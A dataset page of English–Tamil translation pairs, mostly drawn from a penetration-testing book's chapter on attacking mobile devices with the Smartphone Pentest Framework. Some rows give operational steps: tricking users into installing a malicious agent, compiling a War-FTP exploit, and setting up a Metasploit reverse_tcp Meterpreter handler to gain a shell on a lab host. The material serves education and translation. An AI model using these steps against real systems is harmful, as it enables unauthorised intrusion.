en
stringlengths 4
3.31k
| translation
stringlengths 5
3.49k
| target_lang
stringclasses 10
values | domain
stringclasses 6
values | complexity
stringclasses 3
values |
|---|---|---|---|---|
Mobile devices are now entering the workplace en masse.
|
மொபைல் சாதனங்கள் இப்போது பணியிடத்திற்குள் பெருமளவில் நுழைகின்றன.
|
ta
|
technical
|
simple
|
It falls to security teams and pentesters to evaluate the security risks of these devices.
|
இந்த சாதனங்களின் பாதுகாப்பு அபாயங்களை மதிப்பீடு செய்ய பாதுகாப்பு குழுக்களும், ஊடுருவல் சோதனையாளர்களும் உள்ளனர்.
|
ta
|
technical
|
moderate
|
Mobile technology is a rapidly developing field.
|
மொபைல் தொழில்நுட்பம் வேகமாக வளர்ந்து வரும் ஒரு துறையாகும்.
|
ta
|
technical
|
simple
|
Developing new mobile attacks and post-exploitation techniques is an ideal place to start with your own security research.
|
புதிய மொபைல் தாக்குதல்கள் மற்றும் சுரண்டலுக்குப் பிந்தைய நுட்பங்களை உருவாக்குவது உங்கள் சொந்த பாதுகாப்பு ஆராய்ச்சியைத் தொடங்க ஒரு சிறந்த இடமாகும்.
|
ta
|
technical
|
moderate
|
We’ll be discussing a tool I created to help pentesters to assess the security posture of mobile devices, the Smartphone Pentest Framework (SPF).
|
மொபைல் சாதனங்களின் பாதுகாப்பு நிலையை மதிப்பிடுவதற்கு ஊடுருவல் சோதனையாளர்களுக்கு உதவும் வகையில் நான் உருவாக்கிய ஒரு கருவி பற்றி விவாதிப்போம், அதாவது ஸ்மார்ட்போன் பென்டெஸ்ட் கட்டமைப்பு (SPF).
|
ta
|
technical
|
complex
|
After working your way through this book, you will be ready to embark on your own infosec journey.
|
இந்தப் புத்தகத்தின் மூலம் நீங்கள் பணியாற்றிய பிறகு, உங்கள் சொந்த தகவல் பாதுகாப்பு பயணத்தைத் தொடங்கத் தயாராக இருப்பீர்கள்.
|
ta
|
technical
|
moderate
|
For most of the examples in this chapter, we’ll use the Android platform as a target.
|
இந்த அத்தியாயத்தில் உள்ள பெரும்பாலான எடுத்துக்காட்டுகளுக்கு, நாங்கள் Android தளத்தை இலக்காகப் பயன்படுத்துவோம்.
|
ta
|
technical
|
simple
|
Mobile devices run operating systems, speak TCP/IP, and access a lot of the same resources that traditional computers do.
|
மொபைல் சாதனங்கள் இயக்க முறைமைகளை இயக்குகின்றன, TCP/IP பேசுகின்றன மற்றும் பாரம்பரிய கணினிகள் செய்யும் அதே வளங்களை அணுகுகின்றன.
|
ta
|
technical
|
moderate
|
They also have their own unique features that add new attack vectors and protocols to the mix.
|
அவை புதிய தாக்குதல் வெக்டர்கள் மற்றும் நெறிமுறைகளை கலவையில் சேர்க்கும் தனித்துவமான அம்சங்களையும் கொண்டுள்ளன.
|
ta
|
technical
|
moderate
|
Some features have been causing security problems on devices for years.
|
சில அம்சங்கள் பல ஆண்டுகளாக சாதனங்களில் பாதுகாப்பு சிக்கல்களை ஏற்படுத்தி வருகின்றன.
|
ta
|
technical
|
simple
|
SMS opens up a new social-engineering attack vector.
|
SMS ஒரு புதிய சமூக பொறியியல் தாக்குதல் வெக்டரைத் திறக்கிறது.
|
ta
|
technical
|
simple
|
SMS is an ideal vector for spam and phishing attacks.
|
SMS ஸ்பேம் மற்றும் ஃபிஷிங் தாக்குதல்களுக்கு ஒரு சிறந்த வெக்டராகும்.
|
ta
|
technical
|
simple
|
Security-awareness training will need to be augmented to include this threat.
|
இந்த அச்சுறுத்தலை உள்ளடக்குவதற்கு பாதுகாப்பு குறித்த விழிப்புணர்வு பயிற்சி அதிகரிக்கப்பட வேண்டும்.
|
ta
|
technical
|
moderate
|
A user who knows better than to click a random link in a suspicious-looking email may still click a random link in a text message.
|
சந்தேகத்திற்குரிய மின்னஞ்சலில் உள்ள ஒரு சீரற்ற இணைப்பைக் கிளிக் செய்வதை விட நன்றாகத் தெரிந்த ஒரு பயனர், இன்னும் ஒரு குறுஞ்செய்தியில் உள்ள சீரற்ற இணைப்பைக் கிளிக் செய்யலாம்.
|
ta
|
technical
|
complex
|
Mobile devices bring yet another attack vector to the table: near field communication, or NFC.
|
மொபைல் சாதனங்கள் மற்றொரு தாக்குதல் வெக்டரை அட்டவணையில் கொண்டு வருகின்றன: அருகாமை புல தொடர்பு, அல்லது NFC.
|
ta
|
technical
|
moderate
|
NFC allows devices to share data by touching or being near each other.
|
NFC சாதனங்கள் ஒன்றைய ஒன்று தொடுவதன் மூலம் அல்லது அருகில் இருப்பதன் மூலம் தரவைப் பகிர அனுமதிக்கிறது.
|
ta
|
technical
|
simple
|
NFC is another ideal social-engineering attack vector.
|
NFC மற்றொரு சிறந்த சமூக பொறியியல் தாக்குதல் வெக்டராகும்.
|
ta
|
technical
|
simple
|
QR codes can embed URLs, send data to an application on a mobile device, and so on.
|
QR குறியீடுகள் URLகளை உட்பொதிக்கலாம், மொபைல் சாதனத்தில் உள்ள ஒரு பயன்பாட்டிற்கு தரவை அனுப்பலாம், இன்னும் பல.
|
ta
|
technical
|
moderate
|
That QR code on a store window doesn’t have to point to the store’s website.
|
கடை ஜன்னலில் உள்ள QR குறியீடு கடையின் வலைத்தளத்திற்குச் சுட்டிக்காட்ட வேண்டியதில்லை.
|
ta
|
technical
|
simple
|
We will spend the rest of the chapter exploring SPF’s various options.
|
இந்த அத்தியாயத்தின் மீதமுள்ள பகுதியை SPF இன் பல்வேறு விருப்பங்களை ஆராய்வதில் செலவிடுவோம்.
|
ta
|
technical
|
simple
|
Various USSD tags offer all sorts of functionality.
|
பல்வேறு USSD குறிச்சொற்கள் பலவிதமான செயல்பாடுகளை வழங்குகின்றன.
|
ta
|
technical
|
moderate
|
Our example will use a more innocuous payload than the one described previously.
|
முன்னர் விவரிக்கப்பட்டதை விட, எங்கள் உதாரணம் மிகவும் பாதிப்பில்லாத பேலோடைப் பயன்படுத்தும்.
|
ta
|
technical
|
moderate
|
We’ll have our device automatically dial a code to present its unique identifier in a pop-up.
|
ஒரு பாப்-அப்பில் அதன் தனிப்பட்ட அடையாளங்காட்டியைக் காட்ட, எங்கள் சாதனம் தானாகவே ஒரு குறியீட்டை டயல் செய்யும்.
|
ta
|
technical
|
moderate
|
To run the safe USSD example in SPF, choose menu option 6, then 3.) USSD Webpage Attack (Safe) u.
|
SPF இல் பாதுகாப்பான USSD உதாரணத்தை இயக்க, மெனு விருப்பம் 6 ஐத் தேர்ந்தெடுத்து, பின்னர் 3.) USSD வலைப்பக்கத் தாக்குதல் (பாதுகாப்பானது) u.
|
ta
|
technical
|
moderate
|
You’ll be asked for the location of the web server, the name of the malicious page, and the phone number to text it to.
|
வலை சேவையகத்தின் இருப்பிடம், தீங்கிழைக்கும் பக்கத்தின் பெயர் மற்றும் அதற்கு உரை அனுப்ப வேண்டிய தொலைபேசி எண் ஆகியவற்றைக் கேட்கப்படுவீர்கள்.
|
ta
|
technical
|
moderate
|
This time, instead of crashing the browser, the dialer app opens, and a pop-up notification appears.
|
இந்த முறை, உலாவி செயலிழப்பதற்கு பதிலாக, டயலர் பயன்பாடு திறக்கிறது, மேலும் ஒரு பாப்-அப் அறிவிப்பு தோன்றும்.
|
ta
|
technical
|
moderate
|
As it turns out, our emulator has no unique identifier, so the number is blank.
|
எங்கள் எமுலேட்டருக்கு தனித்துவமான அடையாளங்காட்டி இல்லை, எனவே எண் காலியாக உள்ளது.
|
ta
|
technical
|
moderate
|
Though this example was not harmful to the device or its data, other USSD codes can be if they are opened in the dialer.
|
இந்த உதாரணம் சாதனம் அல்லது அதன் தரவுக்கு தீங்கு விளைவிக்கவில்லை என்றாலும், மற்ற USSD குறியீடுகள் டயலரில் திறக்கப்பட்டால் தீங்கு விளைவிக்கும்.
|
ta
|
technical
|
moderate
|
Android has a complicated relationship with security updates.
|
Android பாதுகாப்பு புதுப்பிப்புகளுடன் சிக்கலான உறவைக் கொண்டுள்ளது.
|
ta
|
technical
|
moderate
|
The problem is that anyone can make an Android device with its own implementation of the Android OS.
|
பிரச்சனை என்னவென்றால், எவரும் Android OS இன் சொந்த அமலாக்கத்துடன் Android சாதனத்தை உருவாக்க முடியும்.
|
ta
|
technical
|
moderate
|
When Google releases a new version with a set of patches, every original equipment manufacturer (OEM) needs to port the changes to its version of Android, and the carriers need to push updates to their devices.
|
Google ஒரு புதிய பதிப்பை பேட்ச் தொகுப்புடன் வெளியிடும்போது, ஒவ்வொரு அசல் உபகரண உற்பத்தியாளரும் (OEM) மாற்றங்களை அதன் Android பதிப்பிற்கு மாற்ற வேண்டும், மேலும் கேரியர்கள் தங்கள் சாதனங்களுக்கு புதுப்பிப்புகளை அனுப்ப வேண்டும்.
|
ta
|
technical
|
complex
|
However, updates are not delivered consistently, which means that millions of unpatched devices may be in use, depending on the model and the carrier.
|
இருப்பினும், புதுப்பிப்புகள் தொடர்ந்து வழங்கப்படுவதில்லை, அதாவது மாதிரி மற்றும் கேரியரைப் பொறுத்து, மில்லியன் கணக்கான பேட்ச் செய்யப்படாத சாதனங்கள் பயன்பாட்டில் இருக்கலாம்.
|
ta
|
technical
|
complex
|
Now let’s turn our attention to a vulnerability that will probably never be patched: malicious applications.
|
இப்போது, ஒருபோதும் பேட்ச் செய்யப்படாத ஒரு பாதிப்புக்கு நமது கவனத்தைத் திருப்புவோம்: தீங்கிழைக்கும் பயன்பாடுகள்.
|
ta
|
technical
|
moderate
|
We created malicious executables with Msfvenom in Chapter 4, uploaded back- doors to vulnerable web servers in Chapter 8, looked at social-engineering attacks to trick users into downloading and running malicious programs in Chapter 11, and bypassed antivirus programs in Chapter 12.
|
நாம் 4 ஆம் அதிகாரத்தில் Msfvenom உடன் தீங்கிழைக்கும் செயல்படுத்தக்கூடியவற்றை உருவாக்கினோம், 8 ஆம் அதிகாரத்தில் பாதிக்கப்படக்கூடிய வலை சேவையகங்களுக்குப் பின் கதவுகளைப் பதிவேற்றினோம், 11 ஆம் அதிகாரத்தில் தீங்கிழைக்கும் நிரல்களைப் பதிவிறக்கம் செய்து இயக்குவதற்கு பயனர்களை ஏமாற்ற சமூகப் பொறியியல் தாக்குதல்களைப் பார்த்தோம், மேலும் 12 ஆம் அதிகாரத்தில் வைரஸ் தடுப்பு நிரல்களைத் தவிர்த்தோம்.
|
ta
|
technical
|
complex
|
Mobile users are inundated with reasons to download apps to their devices, and mobile malware is on the rise, much of it in the form of mali- cious applications.
|
மொபைல் பயனர்கள் தங்கள் சாதனங்களில் பயன்பாடுகளைப் பதிவிறக்குவதற்கான காரணங்களால் நிரம்பி வழிகிறார்கள், மேலும் மொபைல் தீம்பொருள் அதிகரித்து வருகிறது, அதில் பெரும்பாலானவை தீங்கிழைக்கும் பயன்பாடுகளின் வடிவத்தில் உள்ளன.
|
ta
|
technical
|
moderate
|
If a user can be tricked into installing a malicious app, the attacker can utilize Android’s APIs to steal data, gain remote control, and even attack other devices.
|
ஒரு பயனர் தீங்கிழைக்கும் பயன்பாட்டை நிறுவ ஏமாற்றப்பட்டால், தாக்குபவர் தரவை திருட, தொலைநிலை கட்டுப்பாட்டைப் பெற மற்றும் பிற சாதனங்களைத் தாக்க Android இன் APIகளைப் பயன்படுத்தலாம்.
|
ta
|
technical
|
complex
|
In the Android security model, apps must request permissions to use APIs that could be used maliciously, and users must accept the requested permissions at installation.
|
Android பாதுகாப்பு மாதிரியில், தீங்கிழைக்கும் வகையில் பயன்படுத்தக்கூடிய APIகளைப் பயன்படுத்த பயன்பாடுகள் அனுமதிகளைக் கோர வேண்டும், மேலும் பயனர்கள் நிறுவலில் கோரப்பட்ட அனுமதிகளை ஏற்க வேண்டும்.
|
ta
|
technical
|
complex
|
We can use Android permis- sions to control the device without running an additional exploit after the user installs the malicious app.
|
தீங்கிழைக்கும் பயன்பாட்டை பயனர் நிறுவிய பின், கூடுதல் சுரண்டலை இயக்காமல் சாதனத்தை கட்டுப்படுத்த Android அனுமதிகளைப் பயன்படுத்தலாம்.
|
ta
|
technical
|
moderate
|
SPF allows us to create a malicious app with a variety of interesting func- tionality.
|
SPF ஆனது பல்வேறு சுவாரஸ்யமான செயல்பாடுகளுடன் ஒரு தீங்கிழைக்கும் பயன்பாட்டை உருவாக்க அனுமதிக்கிறது.
|
ta
|
technical
|
moderate
|
Earlier we used the SPF app on our pentester-controlled device to allow SPF to use the device’s mobile modem and other functionality; our goal here is to trick users into installing the SPF agent on target devices.
|
முன்பு, சாதனத்தின் மொபைல் மோடம் மற்றும் பிற செயல்பாடுகளைப் பயன்படுத்த SPF ஐ அனுமதிப்பதற்காக, எங்கள் பென்டெஸ்டர்-கட்டுப்படுத்தப்பட்ட சாதனத்தில் SPF பயன்பாட்டைப் பயன்படுத்தினோம்; இங்கு எங்கள் குறிக்கோள் என்னவென்றால், இலக்கு சாதனங்களில் SPF முகவரை நிறுவ பயனர்களை ஏமாற்றுவதாகும்.
|
ta
|
technical
|
complex
|
The company's network was vulnerable to several attacks.
|
நிறுவனத்தின் நெட்வொர்க் பல தாக்குதல்களுக்கு ஆளாகக்கூடியதாக இருந்தது.
|
ta
|
technical
|
moderate
|
Install the latest security patches to protect your system.
|
உங்கள் கணினியைப் பாதுகாக்க சமீபத்திய பாதுகாப்பு இணைப்புகளை நிறுவவும்.
|
ta
|
technical
|
simple
|
Penetration testing helps identify weaknesses in a system.
|
ஊடுருவல் சோதனை ஒரு கணினியில் உள்ள பலவீனங்களை அடையாளம் காண உதவுகிறது.
|
ta
|
technical
|
moderate
|
A firewall is essential for network security.
|
ஒரு ஃபயர்வாள் நெட்வொர்க் பாதுகாப்பிற்கு அவசியமானது.
|
ta
|
technical
|
simple
|
Regularly back up your data to prevent data loss.
|
தரவு இழப்பைத் தடுக்க, உங்கள் தரவை தவறாமல் காப்புப்பிரதி எடுக்கவும்.
|
ta
|
general
|
simple
|
The hacker exploited a vulnerability in the web server.
|
ஹேக்கர் வலை சேவையகத்தில் உள்ள ஒரு பாதிப்பைப் பயன்படுத்திக் கொண்டார்.
|
ta
|
technical
|
moderate
|
Strong passwords are the first line of defense against cyberattacks.
|
வலுவான கடவுச்சொற்கள் சைபர் தாக்குதல்களுக்கு எதிரான முதல் பாதுகாப்பு வரிசையாகும்.
|
ta
|
general
|
simple
|
Social engineering is a common tactic used by attackers.
|
சமூக பொறியியல் என்பது தாக்குபவர்களால் பயன்படுத்தப்படும் ஒரு பொதுவான தந்திரோபாயமாகும்.
|
ta
|
technical
|
moderate
|
The security audit revealed several critical flaws.
|
பாதுகாப்பு தணிக்கை பல முக்கியமான குறைபாடுகளை வெளிப்படுத்தியது.
|
ta
|
technical
|
moderate
|
Always keep your software updated to patch security holes.
|
பாதுகாப்பு ஓட்டைகளை சரிசெய்ய உங்கள் மென்பொருளை எப்போதும் புதுப்பித்த நிலையில் வைத்திருங்கள்.
|
ta
|
technical
|
simple
|
The attacker used a phishing email to steal credentials.
|
கடவுச்சொற்களைத் திருட தாக்குபவர் ஒரு ஃபிஷிங் மின்னஞ்சலைப் பயன்படுத்தினார்.
|
ta
|
technical
|
moderate
|
Network segmentation can limit the impact of a breach.
|
நெட்வொர்க் பிரிப்பு ஒரு மீறலின் தாக்கத்தை கட்டுப்படுத்த முடியும்.
|
ta
|
technical
|
moderate
|
Encryption protects sensitive data from unauthorized access.
|
அங்கீகரிக்கப்படாத அணுகலில் இருந்து முக்கியமான தரவைப் பாதுகாக்கிறது.
|
ta
|
technical
|
simple
|
The company implemented multi-factor authentication for added security.
|
நிறுவனம் கூடுதல் பாதுகாப்பிற்காக பல காரணி அங்கீகாரத்தை செயல்படுத்தியது.
|
ta
|
technical
|
moderate
|
A denial-of-service attack can disrupt online services.
|
சேவை மறுப்பு தாக்குதல் ஆன்லைன் சேவைகளை சீர்குலைக்கும்.
|
ta
|
technical
|
moderate
|
The security team conducted a thorough risk assessment.
|
பாதுகாப்பு குழு ஒரு முழுமையான இடர் மதிப்பீட்டை நடத்தியது.
|
ta
|
technical
|
moderate
|
Regular vulnerability scanning is crucial for maintaining security.
|
பாதுகாப்பை பராமரிக்க வழக்கமான பாதிப்பு ஸ்கேனிங் முக்கியமானது.
|
ta
|
technical
|
moderate
|
The incident response plan was activated after the breach.
|
மீறலுக்குப் பிறகு சம்பவ பதில் திட்டம் செயல்படுத்தப்பட்டது.
|
ta
|
technical
|
moderate
|
Educate employees about phishing and social engineering tactics.
|
ஃபிஷிங் மற்றும் சமூக பொறியியல் தந்திரோபாயங்கள் பற்றி ஊழியர்களுக்கு பயிற்சி அளிக்கவும்.
|
ta
|
general
|
moderate
|
The security of the system depends on multiple layers of defense.
|
கணினியின் பாதுகாப்பு பல பாதுகாப்பு அடுக்குகளைப் பொறுத்தது.
|
ta
|
technical
|
complex
|
Nessus detection of vulnerabilities is discussed in chapter 139.
|
139-வது அத்தியாயத்தில் பாதிப்புகளைக் கண்டறிவதற்கான நெசஸ் பற்றிய தகவல் விவரிக்கப்பட்டுள்ளது.
|
ta
|
technical
|
moderate
|
The book discusses wireless attacks on pages 339–357.
|
இந்தப் புத்தகம் 339–357 பக்கங்களில் வயர்லெஸ் தாக்குதல்களைப் பற்றி விவாதிக்கிறது.
|
ta
|
technical
|
simple
|
Wireshark is used for capturing and dissecting network traffic.
|
வைரஷர்க் நெட்வொர்க் போக்குவரத்தை கைப்பற்றவும், பகுப்பாய்வு செய்யவும் பயன்படுகிறது.
|
ta
|
technical
|
moderate
|
The book provides information on WPA2 cracking keys.
|
இந்தப் புத்தகம் WPA2 குறியீடுகளை உடைப்பது பற்றிய தகவல்களை வழங்குகிறது.
|
ta
|
technical
|
moderate
|
XAMPP's default install location is mentioned on page 186.
|
XAMPP-ன் இயல்புநிலை நிறுவல் இருப்பிடம் 186-வது பக்கத்தில் குறிப்பிடப்பட்டுள்ளது.
|
ta
|
technical
|
simple
|
The book covers XSS (cross-site scripting) vulnerabilities.
|
இந்தப் புத்தகம் XSS (கிராஸ்-சைட் ஸ்கிரிப்டிங்) பாதிப்புகளைப் பற்றி உள்ளடக்கியுள்ளது.
|
ta
|
technical
|
moderate
|
The book is printed and bound by Sheridan Books, Inc.
|
இந்தப் புத்தகம் ஷெரிடன் புக்ஸ், இன்க். மூலம் அச்சிடப்பட்டு பிணைக்கப்பட்டுள்ளது.
|
ta
|
general
|
simple
|
Visit http://nostarch.com/pentesting/ for updates.
|
புதுப்பிப்புகளுக்கு http://nostarch.com/pentesting/ ஐப் பார்வையிடவும்.
|
ta
|
general
|
simple
|
The book is certified by the Forest Stewardship Council (FSC).
|
இந்தப் புத்தகம் வன மேலாண்மை கவுன்சிலால் (FSC) சான்றளிக்கப்பட்டது.
|
ta
|
general
|
simple
|
The paper used is 60# Finch Offset.
|
பயன்படுத்தப்பட்ட காகிதம் 60# பின்ச் ஆஃப்செட் ஆகும்.
|
ta
|
general
|
simple
|
The book uses a layflat binding.
|
இந்தப் புத்தகம் ஒரு லேஃப்ளாட் பைண்டிங்கைப் பயன்படுத்துகிறது.
|
ta
|
general
|
simple
|
You can find 7-Zip programs for Windows and Linux platforms.
|
விண்டோஸ் மற்றும் லினக்ஸ் தளங்களுக்கான 7-Zip நிரல்களை நீங்கள் காணலாம்.
|
ta
|
technical
|
simple
|
Mac users can use Ez7z.
|
மேக் பயனர்கள் Ez7z ஐப் பயன்படுத்தலாம்.
|
ta
|
technical
|
simple
|
If you’re unable to download the files, we’ll send you a DVD.
|
நீங்கள் கோப்புகளைப் பதிவிறக்க முடியாவிட்டால், நாங்கள் உங்களுக்கு ஒரு DVD அனுப்புவோம்.
|
ta
|
general
|
moderate
|
Additional resources are available at Georgia Weidman’s website.
|
கூடுதல் ஆதாரங்கள் ஜார்ஜியா வைட்மேனின் இணையதளத்தில் கிடைக்கின்றன.
|
ta
|
general
|
simple
|
The book covers topics related to penetration testing.
|
இந்தப் புத்தகம் ஊடுருவல் சோதனை தொடர்பான தலைப்புகளை உள்ளடக்கியது.
|
ta
|
technical
|
simple
|
The book provides a hands-on introduction to hacking.
|
இந்தப் புத்தகம் ஹேக்கிங்கைப் பற்றிய கையேடு அறிமுகத்தை வழங்குகிறது.
|
ta
|
technical
|
simple
|
The book discusses local privilege escalation.
|
இந்தப் புத்தகம் உள்ளூர் சலுகை விரிவாக்கம் பற்றி விவாதிக்கிறது.
|
ta
|
technical
|
moderate
|
The book explains how to set up to behave as a member of a Windows domain.
|
விண்டோஸ் டொமைனின் உறுப்பினராக எவ்வாறு செயல்படுவது என்பதைப் புத்தகம் விளக்குகிறது.
|
ta
|
technical
|
complex
|
The book provides information on the windows/local/bypassuac exploit.
|
விண்டோஸ்/லோக்கல்/பைபாஸ்யுஏசி சுரண்டல் பற்றிய தகவல்களை இந்தப் புத்தகம் வழங்குகிறது.
|
ta
|
technical
|
moderate
|
We can do the same thing for Android as long as we have an ARM cross compiler.
|
ARM குறுக்கு கம்பைலரை வைத்திருந்தால், ஆண்ட்ராய்டுக்கும் இதே வேலையைச் செய்யலாம்.
|
ta
|
technical
|
moderate
|
Luckily, SPF has one. As shown in Listing 20-23, choose option 9.) Compile code to run on mobile devices from the main menu.
|
அதிர்ஷ்டவசமாக, SPF ஒன்றைக் கொண்டுள்ளது. பட்டியல் 20-23 இல் காட்டப்பட்டுள்ளபடி, பிரதான மெனுவில் இருந்து மொபைல் சாதனங்களில் இயக்க குறியீட்டைத் தொகுக்க, விருப்பம் 9) ஐத் தேர்ந்தெடுக்கவும்.
|
ta
|
technical
|
moderate
|
Compile code to run on mobile devices 1.) Compile C code for ARM Android spf> 1u Compiles C code to run on ARM based Android devices.
|
மொபைல் சாதனங்களில் இயக்க குறியீட்டைத் தொகுக்கவும் 1.) ARM Android-க்காக C குறியீட்டைத் தொகுக்கவும் spf> 1u ARM அடிப்படையிலான Android சாதனங்களில் இயக்க C குறியீட்டைத் தொகுக்கிறது.
|
ta
|
technical
|
moderate
|
Supply the C code file and the output filename File to Compile: /root/Smartphone-Pentest-Framework/exploits/Windows/warftpmeterpreter.cv Output File: /root/Smartphone-Pentest-Framework/exploits/Windows/warftpmeterpreter
|
C குறியீடு கோப்பையும், வெளியீட்டு கோப்பு பெயரையும் வழங்கவும். தொகுக்க வேண்டிய கோப்பு: /root/Smartphone-Pentest-Framework/exploits/Windows/warftpmeterpreter.cv வெளியீட்டு கோப்பு: /root/Smartphone-Pentest-Framework/exploits/Windows/warftpmeterpreter
|
ta
|
technical
|
complex
|
Select 1.) Compile C code for ARM Android u. You will be prompted for the C file to compile as well as where you want to put the compiled binary v.
|
1.) ARM Android-க்காக C குறியீட்டைத் தொகுக்கவும் u. தொகுக்க வேண்டிய C கோப்பு மற்றும் தொகுக்கப்பட்ட பைனரியை எங்கு வைக்க வேண்டும் v என்பதைக் கேட்கப்படுவீர்கள்.
|
ta
|
technical
|
moderate
|
Now we need to download the War-FTP exploit to our infected Android device.
|
இப்போது, எங்கள் பாதிக்கப்பட்ட Android சாதனத்தில் War-FTP சுரண்டலை பதிவிறக்கம் செய்ய வேண்டும்.
|
ta
|
technical
|
moderate
|
From the agent commands menu, choose option 6 to download a file.
|
ஏஜென்ட் கட்டளைகள் மெனுவிலிருந்து, ஒரு கோப்பை பதிவிறக்கம் செய்ய விருப்பம் 6 ஐத் தேர்ந்தெடுக்கவும்.
|
ta
|
technical
|
simple
|
You will be asked for the file to download and the delivery method, as shown in Listing 20-24.
|
பட்டியல் 20-24 இல் காட்டப்பட்டுள்ளபடி, பதிவிறக்கம் செய்ய வேண்டிய கோப்பு மற்றும் டெலிவரி முறை கேட்கப்படும்.
|
ta
|
technical
|
moderate
|
Select a command to perform or 0 to return to the previous menu spf> 6 Downloads a file to the phone.
|
செய்ய வேண்டிய கட்டளையைத் தேர்ந்தெடுக்கவும் அல்லது முந்தைய மெனுவிற்குச் செல்ல 0 ஐ அழுத்தவும் spf> 6 தொலைபேசியில் ஒரு கோப்பை பதிவிறக்குகிறது.
|
ta
|
technical
|
simple
|
Fill in the file and the delivery method(SMS or HTTP). File to download: /root/Smartphone-Pentest-Framework/exploits/Windows/warftpmeterpreter Delivery Method(SMS or HTTP): HTTP
|
கோப்பை நிரப்பவும் மற்றும் டெலிவரி முறையை(SMS அல்லது HTTP) உள்ளிடவும். பதிவிறக்கம் செய்ய வேண்டிய கோப்பு: /root/Smartphone-Pentest-Framework/exploits/Windows/warftpmeterpreter டெலிவரி முறை(SMS அல்லது HTTP): HTTP
|
ta
|
technical
|
moderate
|
Before we run the exploit, we need to set up a handler in Msfconsole, as shown in Listing 20-25.
|
சுரண்டலை இயக்குவதற்கு முன், பட்டியல் 20-25 இல் காட்டப்பட்டுள்ளபடி, Msfconsole இல் ஒரு ஹேண்ட்லரை அமைக்க வேண்டும்.
|
ta
|
technical
|
moderate
|
Open Msfconsole on Kali, and use the multi/ handler module, setting the options to match the payload in the War-FTP exploit.
|
காலி-யில் Msfconsole ஐத் திறந்து, multi/handler தொகுதியைப் பயன்படுத்தவும், War-FTP சுரண்டலில் உள்ள பேலோடுக்கு பொருந்தும் விருப்பங்களை அமைக்கவும்.
|
ta
|
technical
|
moderate
|
msf > use multi/handler msf exploit(handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp
|
msf > multi/handler ஐப் பயன்படுத்துக msf exploit(handler) > பேலோடை அமைக்கவும் windows/meterpreter/reverse_tcp பேலோடு => windows/meterpreter/reverse_tcp
|
ta
|
technical
|
complex
|
msf exploit(handler) > set LHOST 192.168.20.9 LHOST => 192.168.20.9 msf exploit(handler) > exploit [*] Started reverse handler on 192.168.20.9:4444 [*] Starting the payload handler...
|
msf exploit(handler) > LHOST 192.168.20.9 ஐ அமைக்கவும் LHOST => 192.168.20.9 msf exploit(handler) > சுரண்டல் [*] 192.168.20.9:4444 இல் தலைகீழ் ஹேண்ட்லர் தொடங்கப்பட்டது [*] பேலோட் ஹேண்ட்லரைத் தொடங்குகிறது...
|
ta
|
technical
|
complex
|
Finally, it’s time to run the exploit. As shown in Listing 20-26, choose option 7.) Execute Command from the agent commands menu; you will be prompted for the command to run.
|
இறுதியாக, சுரண்டலை இயக்குவதற்கான நேரம் இது. பட்டியல் 20-26 இல் காட்டப்பட்டுள்ளபடி, விருப்பம் 7) ஐத் தேர்ந்தெடுக்கவும். ஏஜென்ட் கட்டளைகள் மெனுவிலிருந்து கட்டளையை இயக்கு; இயக்க வேண்டிய கட்டளை கேட்கப்படும்.
|
ta
|
technical
|
moderate
|
Select a command to perform or 0 to return to the previous menu spf> 7 Run a command in the terminal.
|
செய்ய வேண்டிய கட்டளையைத் தேர்ந்தெடுக்கவும் அல்லது முந்தைய மெனுவிற்குச் செல்ல 0 ஐ அழுத்தவும் spf> 7 முனையத்தில் ஒரு கட்டளையை இயக்கவும்.
|
ta
|
technical
|
simple
|
Fill in the command and the delivery method(SMS or HTTP). Command: warftpmeterpreter 192.168.20.10 21u Downloaded?: yesv Delivery Method(SMS or HTTP): HTTP
|
கட்டளையையும் டெலிவரி முறையையும்(SMS அல்லது HTTP) நிரப்பவும். கட்டளை: warftpmeterpreter 192.168.20.10 21u பதிவிறக்கம் செய்யப்பட்டதா?: ஆம்v டெலிவரி முறை(SMS அல்லது HTTP): HTTP
|
ta
|
technical
|
moderate
|
Tell SPF the full command, including arguments u. In this case, we need to tell the exploit the IP address and port to attack.
|
SPF க்கு முழு கட்டளையையும், வாதங்கள் உட்பட u ஐக் கூறுங்கள். இந்த விஷயத்தில், தாக்குவதற்கு IP முகவரி மற்றும் போர்ட்டை சுரண்டலுக்குச் சொல்ல வேண்டும்.
|
ta
|
technical
|
moderate
|
SPF asks if the binary was downloaded. If it was downloaded through SPF, it will be in the agent’s files directory, and SPF will need to know to run it from there.
|
பைனரி பதிவிறக்கம் செய்யப்பட்டதா என்று SPF கேட்கிறது. இது SPF மூலம் பதிவிறக்கம் செய்யப்பட்டால், அது ஏஜென்ட்டின் கோப்புகள் கோப்பகத்தில் இருக்கும், மேலும் அங்கிருந்து அதை இயக்க SPF க்குத் தெரிய வேண்டும்.
|
ta
|
technical
|
moderate
|
In our case, we answer yes v, then enter the delivery method as usual. Watch your Metasploit listener. In about a minute you should receive a Meterpreter prompt like the one shown next.
|
எங்கள் விஷயத்தில், நாங்கள் ஆம் v என்று பதிலளிக்கிறோம், பின்னர் வழக்கம்போல் டெலிவரி முறையை உள்ளிடுகிறோம். உங்கள் Metasploit கேட்பவரைப் பாருங்கள். சுமார் ஒரு நிமிடத்தில் அடுத்ததாகக் காட்டப்பட்டுள்ளதைப் போன்ற ஒரு Meterpreter வரியில் பெற வேண்டும்.
|
ta
|
technical
|
moderate
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.